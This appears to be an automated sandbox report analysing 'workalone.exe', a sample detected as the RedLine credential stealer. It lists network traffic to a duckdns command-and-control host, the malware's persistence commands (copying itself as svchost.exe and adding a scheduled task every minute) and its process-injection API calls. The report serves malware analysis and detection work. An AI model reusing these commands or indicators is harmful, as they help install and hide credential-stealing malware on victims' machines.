Nov 30, 2022 00:08:10.213998079 CET	1244	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 29 Nov 2022 23:08:09 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49688	85.208.136.178	46539	C:\Users\user\Desktop\workalone.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:08:11.122320890 CET	1245	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: saleshor12.duckdns.org:46539 Content-Length: 1144450 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 30, 2022 00:08:11.187195063 CET	1245	IN	HTTP/1.1 100 Continue
Nov 30, 2022 00:08:13.187941074 CET	2375	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 29 Nov 2022 23:08:12 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	00:06:58
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\workalone.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\workalone.exe
Imagebase:	0x590000
File size:	348672 bytes
MD5 hash:	68F42F485ECE93306BEF1E4084D3052E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	00:07:06
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\workalone.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\workalone.exe
Imagebase:	0xd20000
File size:	348672 bytes
MD5 hash:	68F42F485ECE93306BEF1E4084D3052E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	2
Start time:	00:07:06
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	00:07:06
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	00:07:07
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	00:07:07
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	00:07:07
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	00:07:07
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	00:07:07
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
Imagebase:	0x960000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	9
Start time:	00:07:08
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Execution Graph

Execution Coverage:	18.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.7%
Total number of Nodes:	45
Total number of Limit Nodes:	2

Executed Functions

Function 00F88220 Relevance: 1.8, APIs: 1, Instructions: 262
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F884B3

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 86380a7dd947499029bd0bad9b42f2d745cfa061b38e81d3fde7951272b57874
Instruction ID: 20df7b84cbe0a18c0f55a7b32f24153d060e20cbba6542180d0586040e1656e8
Opcode Fuzzy Hash: 86380a7dd947499029bd0bad9b42f2d745cfa061b38e81d3fde7951272b57874
Instruction Fuzzy Hash: 40A14771E002198FDB10DFA8C8817DEBBF2FF48314F448169E819A7291DB749986DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F88214 Relevance: 1.8, APIs: 1, Instructions: 267
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F884B3

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: f69424b480554f2cfb4db88ef243b3bf6e4c49d515437ddf984b3c438978b0a5
Instruction ID: becd111fe4942da64b7337de5c04bba65ba8477643c76bcabed1394e048a6b8c
Opcode Fuzzy Hash: f69424b480554f2cfb4db88ef243b3bf6e4c49d515437ddf984b3c438978b0a5
Instruction Fuzzy Hash: 8AA15771E002198FDB10DFA8C8817EEBBB2FF48314F448169E819A7291DB759986DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F888A9 Relevance: 1.6, APIs: 1, Instructions: 66
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F8893D

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b8540f345198613d1d0bce680e1be8987b89bf2c0e355acddf55a84fb45cb3e1
Instruction ID: 18840c998a1014631c774b75651fbf2815e9e569c265ee276b213849b49f6606
Opcode Fuzzy Hash: b8540f345198613d1d0bce680e1be8987b89bf2c0e355acddf55a84fb45cb3e1
Instruction Fuzzy Hash: 372125B19002499FCB10CFA9C885BEEBBF4FF48320F408429E858A7240D778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F888B0 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F8893D

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 159208b4d496cb5d2ec1fb3f99dc8d99bf2c1cdea080fd0aa82883245cc8c4a3
Instruction ID: 65a9192169e1e7f74eccf04b5ec4232dc0335a1b99eb257fe35cbff2cd2ecdd3
Opcode Fuzzy Hash: 159208b4d496cb5d2ec1fb3f99dc8d99bf2c1cdea080fd0aa82883245cc8c4a3
Instruction Fuzzy Hash: 4E2114B19002499FCB10CF9AC885BDEBBF4FB48320F40842AE918A7240D778A940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F88650 Relevance: 1.6, APIs: 1, Instructions: 62
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 00F886CF

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: ead4e0d5aa08bced5199fcf0452b80c46fd5d9422f9aa3b9f0ec01550d2b4f30
Instruction ID: 03b4626c3cd5ece0862f0f83d129d369bdb7d56e07974347452cd3cb2e4c5d15
Opcode Fuzzy Hash: ead4e0d5aa08bced5199fcf0452b80c46fd5d9422f9aa3b9f0ec01550d2b4f30
Instruction Fuzzy Hash: 672124B1D012599FCB10CFAAC485BEEFBF4BB48324F54816AD418B7240E778A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F88658 Relevance: 1.6, APIs: 1, Instructions: 58
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 00F886CF

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 5fd5a1033351f35c873593cf966f213c65d5fcc6b562dedf639f003a286b9db2
Instruction ID: 71125db76713d31cdb334cda3fdc03e01fc4919b4ae063bbe64751963dac7ff6
Opcode Fuzzy Hash: 5fd5a1033351f35c873593cf966f213c65d5fcc6b562dedf639f003a286b9db2
Instruction Fuzzy Hash: 852106B1D006199FCB10DF9AC485BDEFBF4BB48724F54812AD418A7240E778A9458FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F88711 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F8878E

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9db516188a2032baf135ce9d5cb70a3c2c7599e3d51a7184163572761121a567
Instruction ID: bb6120d96fde52f8b770d682e8d4942a2cd11074bd05c28ce06594645b647af9
Opcode Fuzzy Hash: 9db516188a2032baf135ce9d5cb70a3c2c7599e3d51a7184163572761121a567
Instruction Fuzzy Hash: 7C2113B19002499FCB10CF9AC884BDEBBF4FF48320F148429E558A7210D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F88718 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F8878E

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9980d842f71fed0557bc92f9b92c0df1ea1af028a8ecbb954c8f5266f2fcebef
Instruction ID: c356bc274bdbd729ffb7318a295a57673b996e85f457bced5e2ee3d6dc055405
Opcode Fuzzy Hash: 9980d842f71fed0557bc92f9b92c0df1ea1af028a8ecbb954c8f5266f2fcebef
Instruction Fuzzy Hash: B02103B59002499FCB10CF9AC884BDEFBF4FB48320F148429E918A7250D778AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F88800 Relevance: 1.5, APIs: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F88873

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8ffa882cd2b3e392ed56a6bb851a4c7512ce7493c452719c2634ceca9bfad2c6
Instruction ID: 8890e0096675bdbdc5911e005e456c803f4cc1f382f7391a24762155a7d012c5
Opcode Fuzzy Hash: 8ffa882cd2b3e392ed56a6bb851a4c7512ce7493c452719c2634ceca9bfad2c6
Instruction Fuzzy Hash: 681134B58002499FCB20DF9AC884BDEBFF4FB88320F148419E518A7210C775A951CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F88808 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F88873

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 49a912b59ac6465884f9b916fb710e6c37785dd662dfe9d05d5ff24dd1ff335d
Instruction ID: 6ce2c0172c9c8563ff35d380bc283a227dc592dab6606851cab7b9d388fc32bf
Opcode Fuzzy Hash: 49a912b59ac6465884f9b916fb710e6c37785dd662dfe9d05d5ff24dd1ff335d
Instruction Fuzzy Hash: 6011F2B5900249DFCB20DF9AD884BDEBBF4FB48324F148419E529A7210D775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F889E1 Relevance: 1.5, APIs: 1, Instructions: 44
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00F88A47

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dc1ffaae22e9bc8bcc7f203892ea0aa9c9ab831806080f45eefa33f89a77609f
Instruction ID: db4712e046732c340f467a1f838d274a8084bf9719ca26e1b3e9522ac2fc0c90
Opcode Fuzzy Hash: dc1ffaae22e9bc8bcc7f203892ea0aa9c9ab831806080f45eefa33f89a77609f
Instruction Fuzzy Hash: E31130B0C002498FCB20DF9AD488BDEFBF4FB48324F14886AD418A7240C778A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F889E8 Relevance: 1.5, APIs: 1, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00F88A47

Memory Dump Source

Source File: 00000000.00000002.266526408.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_workalone.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aceca4d630a4e5a2d50677220e83d0de6e761c51c37921456e80e490b9032d50
Instruction ID: e5bb7c85c2ae10e39a66b909465c533515749fde7bc4b6089cd3a911a481d04a
Opcode Fuzzy Hash: aceca4d630a4e5a2d50677220e83d0de6e761c51c37921456e80e490b9032d50
Instruction Fuzzy Hash: 2B1112B18002498FCB20DF9AD484BDEFBF4FB49324F14841AD518A7240C778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D9D5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.266436428.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d9d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7493f4f83d2253d8f4a3912d099d07f3bacc757703c4b5ca3bc04e8adfec77ad
Instruction ID: e62713c7d398024bc2dcffb2963997200943a3654b2a7eeb10c553ae98b4075c
Opcode Fuzzy Hash: 7493f4f83d2253d8f4a3912d099d07f3bacc757703c4b5ca3bc04e8adfec77ad
Instruction Fuzzy Hash: D82149B2504248DFCF05CF10D9C0F26BF66FB98328F2485A9E9494B206C336D856DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D9D5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.266436428.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d9d000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
Instruction ID: a13db939db14dc44c15809d12a83e12d7180ba99de3c8921486eba87c7b7498b
Opcode Fuzzy Hash: c28d7f9b6c052c6bf27c54b29b78abe899c0e928c1954ef857855ef63c427eb8
Instruction Fuzzy Hash: A2110876404284CFCF11CF10D5C4B16BF72FB94324F28C6A9D8490B616C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: workalone.exePID: 5956, Parent PID: 5836COMMON

Execution Graph

Execution Coverage:	16%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.1%
Total number of Nodes:	56
Total number of Limit Nodes:	0

Executed Functions

Function 065E8440 Relevance: 4.1, Strings: 3, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t%$l, xrefs: 065E8A8C
t%$l, xrefs: 065E8AA8
t%$l, xrefs: 065E8A9E

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID:
String ID: t%$l$t%$l$t%$l
API String ID: 0-2282561593
Opcode ID: e78f16b5947bc2d2717818b22cbde387fa704ac0d72bd455f0b951300e245754
Instruction ID: a0c7a4c52c37caf91802c642343d1e2a4078497afabd7a3e99b63cfde5acc1f7
Opcode Fuzzy Hash: e78f16b5947bc2d2717818b22cbde387fa704ac0d72bd455f0b951300e245754
Instruction Fuzzy Hash: 41E1A170A042668FCF59CF75C4501ADFBF1BF95300B14CA6AE896EB241E774DA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 054DDE10 Relevance: 2.2, Strings: 1, Instructions: 927
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,~&j, xrefs: 054DE47D

Memory Dump Source

Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd

Similarity

API ID:
String ID: ,~&j
API String ID: 0-4218847650
Opcode ID: 1a4128564019ab207b161e2a5a91220e6ea3d87f3c1066439a3decb65f76947b
Instruction ID: b371152d1d59e8f2e88a1ceeeb1d8715b98683dbd462d9c649b020d83f691eb4
Opcode Fuzzy Hash: 1a4128564019ab207b161e2a5a91220e6ea3d87f3c1066439a3decb65f76947b
Instruction Fuzzy Hash: F0823075B002548FCB54DF64C898BADB7B2FF88211F1184AAE90A9B391DF349D45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 065EC798 Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 065EC7CA

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8867839bbe4005993aec50c0555a57084e0a7a9377d711bb57b3cd61cf2e5c4
Instruction ID: 28cc40703061904c8610f9bb6cb5aba47d562dac0c2a2bc785712cc08a92d304
Opcode Fuzzy Hash: a8867839bbe4005993aec50c0555a57084e0a7a9377d711bb57b3cd61cf2e5c4
Instruction Fuzzy Hash: 1BF0F475F042159F8B88DBB899406AE77F9BF89204B1044B9D929EB314EB35DE018B81

Uniqueness

Uniqueness Score: -1.00%

Function 065E8878 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a4b4e32127199617992e5e0a7b3cabbd860854c04f5925947705b07a32605f
Instruction ID: 785f01f898a4dd5a1fe24024086fecd3e581fe15a5d864fba6a5015902d5ca3f
Opcode Fuzzy Hash: f8a4b4e32127199617992e5e0a7b3cabbd860854c04f5925947705b07a32605f
Instruction Fuzzy Hash: 3812BC30B006188FDB58DF75C854AAEB7F6BF89214F1484A9E90ADB391DF349C46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065E15A8 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 989ec765a903f732ef971ca7a6c4d733c38e70859f864964cb05a03d05ffef0b
Instruction ID: 5f7022d87e976c6e80816486f34f7f6b359ea421381dfe04b89cefa248c0336d
Opcode Fuzzy Hash: 989ec765a903f732ef971ca7a6c4d733c38e70859f864964cb05a03d05ffef0b
Instruction Fuzzy Hash: E4D19F71E04616CFCB69DF74C4501ADFBB2FF85304F258A69D446AB241EB38AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 065EB464 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,065EBFD6,?,?,?,?,?), ref: 065EC097

Strings

R, xrefs: 065EC02F

Memory Dump Source

Source File: 00000001.00000002.419362995.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_65e0000_workalone.jbxd

Similarity

API ID: DuplicateHandle
String ID: R
API String ID: 3793708945-880014062
Opcode ID: 648d1b851ea367c0b3dd41fb057ccd182a96f2a278e2732f2e0c1f7c6cc579d0
Instruction ID: 72d231c551fc20163d9d8ec9c945843d160352b9958f7dcc9ed0d6d3ba268f2a
Opcode Fuzzy Hash: 648d1b851ea367c0b3dd41fb057ccd182a96f2a278e2732f2e0c1f7c6cc579d0
Instruction Fuzzy Hash: 0E2105B5D002489FDB10CF99D484AEEBBF4FB48310F14842AE918A7310C374A950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 054D08E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 054D0947

Strings

R, xrefs: 054D08FF

Memory Dump Source

Source File: 00000001.00000002.416784184.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_54d0000_workalone.jbxd

Similarity

API ID: ConsoleWindow
String ID: R
API String ID: 2863861424-880014062
Opcode ID: 5c7050963f01dfa60476c0e10ff7608ae2474a3521758b3f13ea5094725b0866
